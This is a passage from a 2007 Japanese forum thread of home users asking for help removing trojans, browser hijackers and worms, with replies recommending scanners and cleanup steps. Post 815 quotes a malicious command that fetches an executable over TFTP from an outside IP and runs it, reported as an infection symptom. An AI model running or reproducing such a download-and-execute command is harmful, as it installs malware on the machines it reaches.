>>746
レスありがとうございます
ProcessExplorerなどで調べてみます


749 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:10:06
こういうのもある
この前雑誌に載ってたよ
ProcessWalker 4.2b プロセスの情報を表示するGUIツール
http://www.vector.co.jp/soft/winnt/util/se221254.html


750 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:21:35
Windows Me で最低限必要なセキュリティ対策 - 自動アップデート
http://www.microsoft.com/japan/athome/security/protect/windowsme/updates.mspx

751 :744:2007/02/05(月) 16:46:13
ProcessExplorerは作者のHPの一番下にあるDownload Process Explorer (1.5 MB)でいいんでしょうか?
いろいろ見て回ったらOSに合わせてあるようなのですが
一番下にしかないようなのですけれど

752 :名無しさん@お腹いっぱい。:2007/02/05(月) 16:59:22
>>744
ProcessExploreもProcessWalkerも機能的にはそんなに差がないようだから
日本人が作ってるProcessWalkerのが日本語インターフェイスなんで解かりやすいと思うよ

753 :名無しさん@お腹いっぱい。:2007/02/05(月) 17:10:18
>>752
MEじゃ使えないみたい

754 :名無しさん@お腹いっぱい。:2007/02/05(月) 18:04:20
WindowsXPなんだけ再インストールしてからウィルスバスターが何度も同じウィルスをあり得ない速度でブロックしまくってんだけど何で?
ウィルス名は覚えてないけどセキュリティーホールを攻撃するタイプらしいです。
しかも自棄にネット重くなるし

755 : ◆N9P3SuvBPo :2007/02/05(月) 18:04:26
>744
>Troj.SVwhost …Hostsファイル書き換えのトロイ?

MEのサポートは終わったけど、まだ「緊急レベルの更新」が配布されてるよ。
今確認すべきことは、マイクロソフトのサイトに繋がるかどうかだね。

補足:MEの初期ブラウザってIE6SP無しVer?

756 :744:2007/02/05(月) 19:08:42
>>755
マイクロソフトのサイトに繋がります
初期ブラウザはIE5です
MicrosoftUpdateで24個でたんですが全部インストールしたほうがいいんでしょうか?

757 :名無しさん@お腹いっぱい。:2007/02/05(月) 19:13:20
>>754
MicrosoftUpdateしたほうがいいよ

758 : ◆N9P3SuvBPo :2007/02/05(月) 19:24:49
>756
とりあえずウイルスを駆除してからだな。

>ハードディスクアクセスランプがしばらくすると点灯しつづける
この症状が無くなってから、全部インストールしたほうがいいと思う。

HijackThisのログを頼む

759 :744:2007/02/05(月) 20:07:11
どうやら操作してる最中は点灯せず
なにもせず放っておくと点灯し続けるみたいです
そうするとネットを起動すると重くなり、一回閉じてもう一度やると普通に見れるみたいです

760 :名無しさん@お腹いっぱい。:2007/02/05(月) 20:07:57
グーグルで検索してるたまに変なページに飛ばされることがあります

↓のページです
http://www.hotwebfinder.info/search.php?q=%93%A1%88%E4%83t%83%7E%83%84


ウィルス原因なんでしょうか?
解決法とかあるでしょうか?


761 :760:2007/02/05(月) 20:18:37
hotwebfinderっていうウィルス?らしいです
グーグル検索時のみリンク先が変更されてしまいます

762 : ◆N9P3SuvBPo :2007/02/05(月) 20:36:59
>759
>なにもせず放っておくと点灯し続けるみたいです
これ、普通ではありえない現象
この症状を自力(執念)で解決できる力はある?

763 :名無しさん@お腹いっぱい。:2007/02/05(月) 20:44:13
>>760
ブラウザハイジャッカではないかな?
>>1を使って環境説明を。。。

764 :760:2007/02/05(月) 21:02:10
【使用OS】 XP
【MicrosoftUpdate】 今日しました
【使用セキュリティソフト】 avast
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 無
【スキャンの結果何が検出されたか】 トロイ一個、アドウェア一個
【どんな症状が出るか】 グーグル検索すると、hotwebfinderというページに飛ばされる
【症状が出る前に何をやったか】 わからない・・・
【症状を解決しようとどのような処置を取ったか】 窓更新、avast更新
【その他の質問】 ググっても情報が少ないです

765 :名無しさん@お腹いっぱい。:2007/02/05(月) 21:42:42
>>764
1、ブラウザ(IE)のツールバー ツール(T)>アドオンの管理>現在読み込まれている「アドオン」はどんなものがありますか?
2、信頼済みサイトに見に覚えの無いURLが登録されていませんか?
3、セキュリティーゾーンの設定内容がいつの間にか変わっていませんか?

非常駐のウイルス駆除ソフトのBitDefender、
フリーのスパイウェア対策駆除のSpywareBlaster、Ad-aware SE、Spybot-S&D も入れておいたほうがいいと思います。
ブラウザの設定に虚弱があれば再感染するかもしれませんけど。

766 :名無しさん@お腹いっぱい。:2007/02/05(月) 22:09:55
>>765
@
http://up2.viploader.net/pic/src/viploader409286.jpg
http://up2.viploader.net/pic/src/viploader409287.jpg
ヤバイものありますか?
A
ありません
B
変わって無いと思います



スパイウェア対策して再度報告します

767 :744:2007/02/05(月) 22:18:15
>>762
いろいろ検索したりしてますが、自力では無理っぽいですね
駄目なようなら再インスコしようと思ってます


768 :名無しさん@お腹いっぱい。:2007/02/05(月) 22:25:32
>>766
@のアドオンの中の、発行元の記載の無いアドオンの・・・
「ipv6mote.dll」と「tlctw32.dll」でググると、CastleCopsというサイトがヒットして、

Filename:「ipv6mote.dll」
Description(解説):Variant of the Infostealer.Bzup trojan

Filename:「tlctw32.dll」
Description(解説):Backdoor trojan, a variant of Trojan-Spy.Win32.Agent.ir

となっていますんで
とりあえずアドオンの管理で読み込み無効にしてから駆除でしょう

769 :名無しさん@お腹いっぱい。:2007/02/05(月) 23:07:28
>>767
1.まずウィルスバスターオンライン以外のオンラインスキャンをしてみる。
2.wordやexcelを使用しているのならoffice update もしておく。
3.アンチウイルスをウィルスセキュリティ以外の9x系が使用可能なものにする。

とりあえずは、せっかく758が見てくれるといってくれているのだから
http://pc10.2ch.net/test/read.cgi/sec/1091346741/1を参考にHijackThisを入手実行すれば?

再インスコするなら今年の6月か7月でwindows updateのアーカイブが削除されるはずだから
windows updateしたときIEのキャッシュからupdateファイルを拾ってCD-Rにでも焼いておけば安心だろう

770 :744:2007/02/05(月) 23:31:12
HijackThisでやってみました
ttp://www.uploda.net/cgi/uploader4/index.php?file_id=0000009889.txt

これでいいのでしょうか?

771 : ◆N9P3SuvBPo :2007/02/06(火) 00:11:41
>770
見たけど、とくに異常な個所は見当たりません。

下記のソフトでスキャンする前に、システムの復元を試してみてください。
(システムの復元はセーフモードで行うこと)

Ad-Aware SEと
ttp://www.higaitaisaku.com/adaware.html
SpyBot S&Dの作業で
ttp://www.higaitaisaku.com/spybot2.html
なんとかなると思います。
最新の定義ファイルに更新して、
・通常モード
・セーフモード
の両方でスキャンしてみてください。

解決したら予防を
ttp://www.higaitaisaku.com/korobanu.html

772 : ◆N9P3SuvBPo :2007/02/06(火) 00:25:09
もう寝るか…

773 :名無しさん@お腹いっぱい。:2007/02/06(火) 00:28:49
>>772
おやすみ
今日もご苦労様

774 :744:2007/02/06(火) 00:32:31
>>771
ありがとうございます
ウィルスセキュリティはいったん削除したほうがいいのでしょうか?
ハードディスクの寿命とかなんでしょうか

775 :名無しさん@お腹いっぱい。:2007/02/06(火) 01:18:13
【使用OS】windows XP
【MicrosoftUpdate】していません
【使用セキュリティソフト】avast
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】無し
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Win32:Agent-DHX[Trj]とWin32:Agent-BPB [Trj]
【どんな症状が出るか】ローカルディスク、Cディスクなんですが、普通はダブルクリックするとディスクを開きますよね。
それが、ダブルクリックするといきなりavastがウイルスを検出し始めます。
Cディスクが「開く」ではなく「自動再生」に変えられてしまっていて、
クリックすることでウイルスを動かしてしまうようです・・・・orz
【症状が出る前に何をやったか】すいません、覚えてないです。何か怪しいexeを踏んだとかではないです。
【症状を解決しようとどのような処置を取ったか】avastでディスクスキャンしてチェストへ移動させた。ad-awareとspybotも使ってみました。
【その他の質問】Cディスクを開こうとする度にウイルスが検出され始めてしまって駆除する方法が分からないです。
ググッてみてもいまいち症状が分からない・・・・

よろしくお願いします

776 :名無しさん@お腹いっぱい。:2007/02/06(火) 08:51:19
>>769

777 :名無しさん@お腹いっぱい。:2007/02/06(火) 09:45:28
【使用OS】 XP Pro SP2
【MicrosoftUpdate】 自動通知
【使用セキュリティソフト】 AVG free
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Downloader.Obfuskated
【どんな症状が出るか】 異常は無い
【症状が出る前に何をやったか】 特に何も
【症状を解決しようとどのような処置を取ったか】 Spybotで検索他
【その他の質問】 Googleで調べても何をするウィルスか不明

Local Settings\Tempから出てきました。
トロイの一種?
通信するプログラムはJeticoで登録しないと通信できないし、
成りすましもハッシュで引っかかるはずなんだが、反応はなし。
access to networkも登録したもの以外弾いてるが、ルールに穴があるかもしれんし一応。
スタートアップはレジストリエディタから見ても怪しいのは見つかりませんでした。
Application Data以下も検出した.exeのファイル名で検索してみたが何もなし。
ttp://blog.livedoor.jp/antiny_virus/
のチェッカでも反応なし。

778 :名無しさん@お腹いっぱい。:2007/02/06(火) 10:06:55
すいません。
こちらで相談した結果リカバリーすることにしたのですが
部屋がゴミ箱状態でフォトショのロムが見当たりません。
今入ってるのを焼いてリカバリー後に移動しても動かないですよね? orz

あと、メール関係やお気に入りとかは保存して再利用しないほうがいいでしょうか?
また同じウイルスに感染するおそれありますか?
被害拡大しないように回線繋げてないため初心者質問でごめんなさい。
ぜひ教えてください。

779 :名無しさん@お腹いっぱい。:2007/02/06(火) 12:53:43
>>778
動きません
お気に入りは問題ないとは思いますが
メールに関しては感染の可能性はありますね
どうしてもというならデータとしてでなく
ファイルとして保存しておき、最新の定義状態で
スキャン後に戻す方が良いと思います
また、感染源が確定していないなら
同様のルートから感染する恐れはあるでしょう

780 :名無しさん@お腹いっぱい。:2007/02/06(火) 13:18:41
【使用OS】ME
【MicrosoftUpdate】特に無し
【使用セキュリティソフト】特に無し
【セキュリティソフトの定義ファイルは最新の状態であるか】特に無し
【ルータの有無】?
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】Trojan
【どんな症状が出るか】特に何も…
【症状が出る前に何をやったか】何か長いURLをクリックしました
【症状を解決しようとどのような処置を取ったか】
カスペルスキーオンラインチェックでウィルスのファイルが見つかったので、
一度コミ箱へ移し、中身を空にしました。
その後、もう一度カスペルスキーオンラインチェックで検査しましたが、ウィルスは
無くなっていませんでした。
ttp://thumb2.uploda.org/file/uporg682671.jpg
【その他の質問】

ゴミ箱へ入れたのが間違いだったのでしょうか。
C:¥_RESTOREというものも見つかりません。
どなたか宜しくお願いします。

781 :名無しさん@お腹いっぱい。:2007/02/06(火) 13:32:05
【使用OS】windows XP
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】ウイルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】踏んだ時は最新、今はわからない
【ルータの有無】有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】・ウイルスバスターが書き換えられたのかスキャンと駆除が不可、最新版に更新が変。しきりに再起動させようとさせる
              ・タスクマネージャーのユーザーにLOCAL SERVICEとNETWORK SEVICEが追加されている。
【症状が出る前に何をやったか】ニュー速VIPのhttp://ex17.2ch.net/test/read.cgi/news4vip/1170684618/>>1のウイルス?か何かを踏んだ
【症状を解決しようとどのような処置を取ったか】ウイルスバスターのスキャン→壊れていたのでオンラインスキャンをしたが検出されず
【その他の質問】
・ウイルスバスターの再インスコはまだしてない。

少ない情報ですが、解決策等ありましたら教えてください。


782 :778:2007/02/06(火) 14:52:05
>>779
ありがとうございました。
メールは大事なものだけをファイルでとっておきます。
ロムは古いバージョンのものはあるので当面はそれを使い、
これを機に部屋とパソコンの中身を整理しようと思います。

783 :名無しさん@お腹いっぱい。:2007/02/06(火) 15:14:54
>>777
CastleCopsで、「Obfuskated」でサイト内検索かけたら。。。スペル訂正されて、「Obfuscated」で2件情報あったよ
Obfuscated Javascript malware
ttp://www.castlecops.com/postlite173537-obfuscated.html

Obfuscated links etc
ttp://www.castlecops.com/postlite164515-obfuscated.html

784 :名無しさん@お腹いっぱい。:2007/02/06(火) 19:59:28
【使用OS】windows XP
【MicrosoftUpdate】最新までしている
【使用セキュリティソフト】Antivir
【セキュリティソフトの定義ファイルは最新の状態であるか】最新
【ルータの有無】なし
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】何も検出されない
【どんな症状が出るか】OCT?だかTCX??だかのファイルが見つかりませんだとか実行できませんだとか
出た後、ガリガリ言い出したから慌ててエクスプローラを強制終了した
【症状が出る前に何をやったか】wmv          .exeファイルをふんだ
【症状を解決しようとどのような処置を取ったか】Antivirのスキャン中
【その他の質問】
ウィルス名と対処法をお願いします。

785 : ◆N9P3SuvBPo :2007/02/06(火) 20:11:13
>784
>【症状が出る前に何をやったか】wmv          .exeファイルをふんだ
その前にそのファイルをどこから落としたか正直に言おうよw

786 :名無しさん@お腹いっぱい。:2007/02/06(火) 20:15:08
>>783
AVGではObfuskatedになってる…
そこのフォーラムではどっかのサイトに飛ばしてくるという話っぽいが
ttp://www.emsisoft.jp/jp/malware/?Trojan-Downloader.Win32.Obfuscated.bh
だとトロイダウンロードツールになってる…
英語自信ないんで読み間違っているかもしれんけど。

ともかく削除したし、警告も何度も出ないし、
通信してもいないし、症状も無いので大丈夫かな。
ありがとうございます。

787 :名無しさん@お腹いっぱい。:2007/02/06(火) 22:10:50
>>635
更に10日間ぐらいの内に6連続でNOD32が検出できないウイルス出現。
今回はフリー製品、御三家(バスター、ノートン、マカフィー)、
その他の製品も多数検出できているのに、NOD32は駄目。


代表的な検出名:Trojan.Dorroper.Joiner
http://vista.crap.jp/img/vi7072259495.jpg
http://www.virustotal.com/


788 :通りすがり:2007/02/06(火) 22:20:48
Fセキュアは、ホームページ見る限りでは良さそうですが、使ったことある人いますか?

789 :名無しさん@お腹いっぱい。:2007/02/06(火) 23:19:17
【風呂きのこ】 clione77 = ネ申 【スーパーハカー】

重要スレ
【爆笑ヤフオク】笑えるシュピン80【腹痛てぇ】
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/
まだ返答の無い質問に激ワラ発言

【リラックス?】僕があなたにモーニングコール!!【1週間分】
ttp://page4.auctions.yahoo.co.jp/jp/show/qanda?aID=d69659688

<神の発言>
http://pc9.2ch.net/test/read.cgi/yahoo/1169051354/514-

<謝りゃいいのにハカー気取りでアフォ三昧>
523 名前:514[sage] 投稿日:2007/02/04(日) 12:07:11 ID:ANQbYgm40
アレッ?
皆、出品者が回答しなくても見れる方法知らないの?
コレ出品しようかなw

yahoo japanを巻き込んでの春節祭の予感にワクテカするスレです。

それでヤフオクはこの対応w
http://auctions.yahoo.co.jp/phtml/auc/jp/notice/20070206.html

790 :宜しくお願いします:2007/02/06(火) 23:40:54
質問させてください。
当会社のIPアドレスがこちらで瑠璃色という人物に不正に利用されています
http://qb5.2ch.net/test/read.cgi/saku/1069381667/
管理会社に問い合わせたところ、とりあえずアンチスパイソフトを
いれてくださいといわれましたが、もう入っています。
なぜ、こういうことがおこるのかさっぱりわかりません。
初心者でもわかるように誰か説明していただければ幸いです。
会社にはパソコンに詳しい者がおりませんので困っています。
初心者のところで聞きましたらば、バックドアというものが
関係しているらしいです。


791 :宜しくお願いします:2007/02/07(水) 00:09:11
もうひとつ、管理の会社の人がおっしゃってたのですが
不正アクセスや迷惑メールのための踏み台に利用されている恐れが
ありますということでした。会社の信用がなくなるということです。



792 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:14:08
>>790-791
(;^ω^)

793 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:18:59
管理者がいないのか・・・・・

794 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:21:03
ウィルス板じゃなくてセキュリティ板だろうに
気の毒なことだ 向こうで答えたのも
華麗にスルーしてるし もうネットに繋ぐの
止めたらいいよ

795 :名無しさん@お腹いっぱい。:2007/02/07(水) 00:39:36
規制議論に居た当会社君か
金払ってその手の仕事の所にやって貰えよ

796 :名無しさん@お腹いっぱい。:2007/02/07(水) 01:54:47
ウイルスの入ったファイルをけしたいのですが使用中で消せません。どうすれば消せるんですか?

797 :名無しさん@お腹いっぱい。:2007/02/07(水) 06:13:43
http://www.plustarnet.com/aspil/Other/Kyosaku.html

798 :名無しさん@お腹いっぱい。:2007/02/07(水) 07:14:33
>>796
つSafeMode

799 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:01:20
ウイルスにやられたっぽい。
右下のアイコンの所に、×印がでてそこから「YOUR COMPUTER IS IN DANGER」 やら 「クリック HERE そしたらあなたのコンピューター守るツールあるよ」的なメッセージがでます。どうしたらいいの?

800 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:33:08
削除すればいいんじゃない?

801 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:38:56
削除?右クリックで?
冷静に状況を把握するとインターネットに繋がらなくなったくらいしか被害がない。今の所。ただ×印は消えない

802 :名無しさん@お腹いっぱい。:2007/02/07(水) 13:58:06
【使用OS】 win2000
【MicrosoftUpdate】 済
【使用セキュリティソフト】 ノートン2005
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】  有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】bloodhound.exploit.45
【どんな症状が出るか】 動作が重い
【症状が出る前に何をやったか】 使用者がPC初心者のため、重い状態で長期間放置
【症状を解決しようとどのような処置を取ったか】 ノートンでBloodhoundを検疫。Ad-awareを実行も何も無し。
【その他の質問】
 ノートンでBloodhoundは削除に成功した様子。(スキャンしてももう出ない。)
 ただし、異常に重い状態なのは解消されず。
 タスクマネージャーのアプリケーションのところに、実行中状態で
 「Quick Launch」というのがあって、再起動するたびに現れる。

 たぶん「Quick Launch」ってのが悪いと思うんですが、
 どうすればでなくなるでしょうか?
 違うとすれば他にどんな原因が。

 ご教示願いします。

803 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:05:42
>>802
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-spyware.quicklaunch.html
これじゃねーの?

804 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:09:41
>>802
Norton2005-2006製品といえば常駐が一番重かった頃です
CPUとメモリ搭載量はどれくらいですか?
パソコンを起動した時の普段のプロセスの数はいくつですか?
たまには、最新エンジンの「シマンテック・セキュリティチェック」もしてみて下さい

805 :名無しさん@お腹いっぱい。:2007/02/07(水) 15:10:32
>>803
回答ありがとうございます。
そのスパイウェアには突き当たったのですが、
「Spyware.QuickLaunch」
はノートンで検出されません。

念のため、そのページで指定されているレジストリもチェックしましたが、
該当するような部分は存在しませんでした。

806 :804:2007/02/07(水) 15:16:41
Nortonがスパイウェアに対応したのは2006製品からです



807 :802:2007/02/07(水) 15:30:32
>>804
他に同型のPCが順調に動作していますので、
スペック上は問題がないと思われます。

とりあえずシマンテック・セキュリティチェックを実行させていただきます。

808 :名無しさん@お腹いっぱい。:2007/02/07(水) 19:47:00
>>799
`∧,,∧  
( ´・ω・)つhttp://siri.urz.free.fr/Fix/SmitfraudFix.exe



809 :名無しさん@お腹いっぱい。:2007/02/07(水) 20:04:04
タスクマネージャにconime.exeが2つもあるのですが、どちらが不適切なプロセスなのでしょうか。
ひとつは64KB、約3000KB使うもうひとつはようです。どちらも小文字です。
対処の仕方も併せてお願いします。

使用しているOSはXP(HOME)SP2です。

810 :809:2007/02/07(水) 20:11:17
タスクマネージャにconime.exeが2つもあるのですが、どちらが不適切なプロセスなのでしょうか。
ひとつは64KB、もうひとつは約3000KB使うようです。どちらも小文字です。
対処の仕方も併せてお願いします。

使用しているOSはXP(HOME)SP2です。

811 :名無しさん@お腹いっぱい。:2007/02/08(木) 00:06:53
実行中の.exe感染型ならどっちもout
対処法→リカバリ

なお 通常XPHOMESP2のconime.exeのパスはc:\windows\system32\


812 :名無しさん@お腹いっぱい。:2007/02/08(木) 06:41:34
conime.exe Microsoft コンソールIME。日本語入力のサポート。

64KBの方が怪しいだろ・・・常識的に考えて・・・

813 :名無しさん@お腹いっぱい。:2007/02/08(木) 08:59:34
知人からメールを受け取り、そのメールに添付されている写真(JPEG)を開いた際、
その写真は通常の写真で「Adobe Photoshop Albu, Mini 3.0」で1枚のみ表示されます。
通常、そこで印刷ボタンを押してその写真を印刷しようとした場合、その写真が印刷できると思うのですが、
印刷ボタンを押すと印刷プレビューが現れ、それまでそのPCでネット閲覧してきたWINDOWSの一時ファイルに
入っているものと思われるものが印刷プレビューに数10枚出てきました。
IEを立ち上げ、ツール→一時ファイルの削除 を実行してもう一度その写真を開くと、
数10枚の写真は出てこず、添付ファイルについているもののみ表示されました。
これは何かのウィルスでしょうか。ご指南お願いします。
(写真を取り込むにした場合と印刷ボタンを押したのと同じ画面になります)

機種:XP(デル)
ブラウザ:IE6.0


814 :名無しさん@お腹いっぱい。:2007/02/08(木) 10:15:22
【使用OS】 XP
【MicrosoftUpdate】 最近してなかった
【使用セキュリティソフト】 AVAST
【セキュリティソフトの定義ファイルは最新の状態であるか】 はい
【ルータの有無】 ない
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 Trojan.Win32:Agent-EEW
                                                   Win32:Agent-BSU
【どんな症状が出るか】 ネット中たまに不安定になる、AVASTが反応する
起動時にインターネットの共同構成(?)が勝手にでてくる
システムの復元も未完了って出て出来ない
【症状が出る前に何をやったか】 エロサイト閲覧中にAntiVermeansっていうポップアップ系のマルに
感染してActiveXなんたらもインストールされた
【症状を解決しようとどのような処置を取ったか】 SmitfraudFix使ったらディスククリーンアップ中にかってに
強制終了してしまい、ディスククリーンアップをキャンセルしてやってみたら
AntiVermeansとActiveXはアンインストールできたっぽい



815 :名無しさん@お腹いっぱい。:2007/02/08(木) 13:59:01
突然、ファイル名を指定して実行が立ち上がり、以下のようなものが実行されました。

%comspec% /c tftp -i 24.205.47.33 GET ammvo.exe & start ammvo

AVGで全チェックしたらammvo.exeが検出され無事削除しました。
ところがしばらくすると再度コマンドが実行されました。今度はammvo.exeではなくbftvy.exeでした。
ルーターのログをチェックしたところ135と445にアタックがかなりきています。
これらのポートはルーターではじいていますがちょっと不安です。

何か情報をお持ちの方がいらっしゃればご教授願います。

816 :名無しさん@お腹いっぱい。:2007/02/08(木) 15:51:13
>>635>>787
こんなやり取りを目撃した。NOD32・・・・・・。∀;)


セキュリティ初心者質問スレッドpart81
631 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:45:19

「Vistaを守れなかったアンチウイルスソフト」:Virus Bulletin調査
ttp://japan.cnet.com/news/sec/story/0,2000056024,20342509,00.htm
>合格した11製品は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantec
>から発売されているアンチウイルスソフトウェアで、すべてのウイルスを検出した。


NOD32は駄目だったのね(´;ω;)


632 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:52:00
>>631
NOD32は、CA、Fortinet、F-Secure、Kaspersky、Sophos、Symantecみたいに、
全てのウイルスは検出できなかったんでしょうな。



633 :名無しさん@お腹いっぱい。:2007/02/08(木) 14:57:21
>>631
以前のNODはよかったけど最近は普通のレベルにまで落ちてしまった

817 :809:2007/02/08(木) 17:36:52
今見たら64kのがない。
バックアップ取ってない(哀)。

818 :809:2007/02/08(木) 17:39:03
プロセスの親玉表示するソフトって何がありましたっけ?
こういうの初めてだからカテゴリーすら分からないです。

819 :名無しさん@お腹いっぱい。:2007/02/08(木) 17:42:42
>>818
conime.exe はコマンドプロンプトを
起動すればでてくるよ

820 :809:2007/02/08(木) 18:17:07
呼び出しても、ドス関連は勉強不足で「何がなんだか」状態です。

821 : ◆N9P3SuvBPo :2007/02/08(木) 18:25:09
>820=>809
conime.exeが2つあった。
ひとつは64KB、もうひとつは約3000KB

PC内をconime.exeを検索

64KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果

約3000KBの方
インストールされている場所:
作成日:
更新日:
著作権:
会社名:
VirusTotalでスキャンした結果

↓VirusTotalのサイト
ttp://virustotal.com/

822 :名無しさん@お腹いっぱい。:2007/02/08(木) 18:39:53
>>815
Botくせえな おい
>>23


823 :809:2007/02/08(木) 18:49:17
やってみます。ひとまずありがとうございます。

824 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:04:12
テンプレ
【使用OS】 XP
【MicrosoftUpdate】 最新
【使用セキュリティソフト】 AVG
【セキュリティソフトの定義ファイルは最新の状態であるか】 最新
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】 なし
【どんな症状が出るか】 hotmailへメールが送られてこなくたった。
【症状が出る前に何をやったか】 Skype paltalk
【症状を解決しようとどのような処置を取ったか】 上記ソフトの削除
【その他の質問】
Perflib_Perfdata_35c.dat
っていうファイルがTEMPにあって気になるのですが
削除できません。
何をしているファイルなんでしょうか。

825 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:12:03
>>824
vmつかってね?
http://obsidian.s53.xrea.com/archives/000336.html

826 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:23:42
>>825
ありがとうございます。使ってません。
VMware、存在は聞いたことはありましたがあまりよくわからなかったのでググりました。
便乗させてもらうのですがIEやfirefoxやネスケを使っていると
決まったサイトで画面が消えてしまうことがあります。
firefoxではダウンロードがうまくできません。
関係あるでしょうか。


827 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:31:34
>>825
度々すみません。
Microsoft VM 診断ツールを使ったところ
# VM ランタイム: あり
# Microsoft VM への依存関係: あり
# Java バイナリ: なし
# MS Java バイナリ: あり
こうでました。
VMの意味を取り違えているでしょうか。

828 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:32:38
トロイを検索して駆除するときってセーフモードでシステムの復元無効でやったほうがいいの?

829 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:35:43
>>826
Perflib_Perfdata_はなんらかのサービスが作成しているらしい マルウェアではないっぽい
Skypeをしばらく止めてみて作成されなくなったらそれが原因じゃないの?
http://www.kotaete-net.net/Default.aspx?pgid=14&qid=40134527421
あと.batを使って起動時に自動消去できるってさ
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413

てかまずググろうぜw

830 :825:2007/02/08(木) 19:37:36
>>827
いや vmwareの意味で言った

831 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:48:20
>>830>>829
ありがとうございます。
ファイル名のままググってました。
http://72.14.235.104/search?q=cache:Awk_eQ_aG2sJ:etc4.2ch.net/test/read.cgi/male/1156325019/+Perflib_Perfdata&hl=ja&ct=clnk&cd=16&gl=jp&lr=lang_ja
Tempフォルダの中身を掃除して
Perflib_Perfdataってのが残ったら人生終了
って書いてあるんですけどどういう意味でしょう。
無視していいのでしょうか。
http://www.google.co.jp/search?q=Perflib_Perfdata&hl=ja&lr=lang_ja&start=10&sa=N
@futurelog 過去ログ
malony.dyndns.org/futurelog/getlog.cgi/20050220.html
投稿者: 投稿日:2005/02/20(日)01時54分58秒. Perflib_Perfdataっていうファイルは危険だから気をつけろ!!
っていうのも見つけました。
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail.php?queId=9486413
の回答者と同じみたいですね。


832 :名無しさん@お腹いっぱい。:2007/02/08(木) 19:55:33
>>831
気になるんなら自動消去オススメ

833 :名無しさん@お腹いっぱい。:2007/02/08(木) 21:26:32
消せなかったらUnlockerおすすめ



834 :809:2007/02/08(木) 22:09:37
64kのものは出てこなかったけど検索結果が95件もありました(哀)。
64件は関係なさそうで10件ぐらいがシステム関連。
日本語パッチ充てたものも入ってるのかな。キツイなあ。

835 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:49:10
みんなは135と445にアクセスない?192.168.0.8宛に飛んでくる

LAN、WANのIPアドレスを変更しても192.168.0.8あてに飛んでくるので不特定多数くさい。

836 :名無しさん@お腹いっぱい。:2007/02/08(木) 22:56:56
自己解決。
135、445は日常飛んでるものらしい。
御恥ずかしいことに、DMZを設置していて、そのアドレスが192.168.0.8だった orz

837 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:03:27
とりあえずどこから来てるのかwhoisで調べてみ
ルータは使ってる?

838 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:05:06
なんだw
俺も書き込む前に更新すりゃよかった
ルータ使ってりゃとどかないはずだけどな

839 : ◆N9P3SuvBPo :2007/02/08(木) 23:09:22
>834
>検索結果が95件もありました
conime.exeという名前のファイルが95件かぁ…
んー頑張って

840 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:09:59
>>813

なんですが、どなたかわかりませんか?

オンラインでスキャンしても何も出ませんでした。
もしかして、ジョークウィルス?

841 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:10:43
>>837
eoとかNTTコミュとかが多いかな

842 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:17:46
W32.Fakerecyに感染した。XPProSP2。
Symantecのツール持ってないんだけど、
手動で駆除する方法知ってる人助けて。

843 : ◆N9P3SuvBPo :2007/02/08(木) 23:25:11
>842
>1のテンプレ

844 :名無しさん@お腹いっぱい。:2007/02/08(木) 23:58:37
スマンカッタ
あわててたもんで。

【使用OS】
WinXP Pro SP2
【MicrosoftUpdate】
手動だとサイトが文字化けするので自動更新にしてる。
【使用セキュリティソフト】
ウィルスバスター
【セキュリティソフトの定義ファイルは最新の状態であるか】
エンジンの最新は8だが今は7。
【ルータの有無】
有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名)】
スキャンできないためツールで駆除できないが、
症状からW32.Fakerecyだと思う。
【どんな症状が出るか】
スタートアップにctfmon.exeとdesktop.iniがいつの間にかできていた。
その他はsymanteのサイトのW32.Fakerecyとまったく同じ。
各ドライブのルートにautorun.infができて、削除しても復活する。
【症状が出る前に何をやったか】
ネットワークドライブやリムバブルディスクで他のメディアにマウント。
【症状を解決しようとどのような処置を取ったか】
1)システムの復元を無効しした。
2)プロセスのctfmon.exeを終了した。
3)スタートアップのファイルを削除。
4)各ドライブのルートにあるautorun.inf、Recycle削除。
【その他の質問】
このワームはレジストリも書き換えてますか?
上記の方法で駆除できてますか?

たすけてー

845 : ◆N9P3SuvBPo :2007/02/09(金) 00:14:43
>844
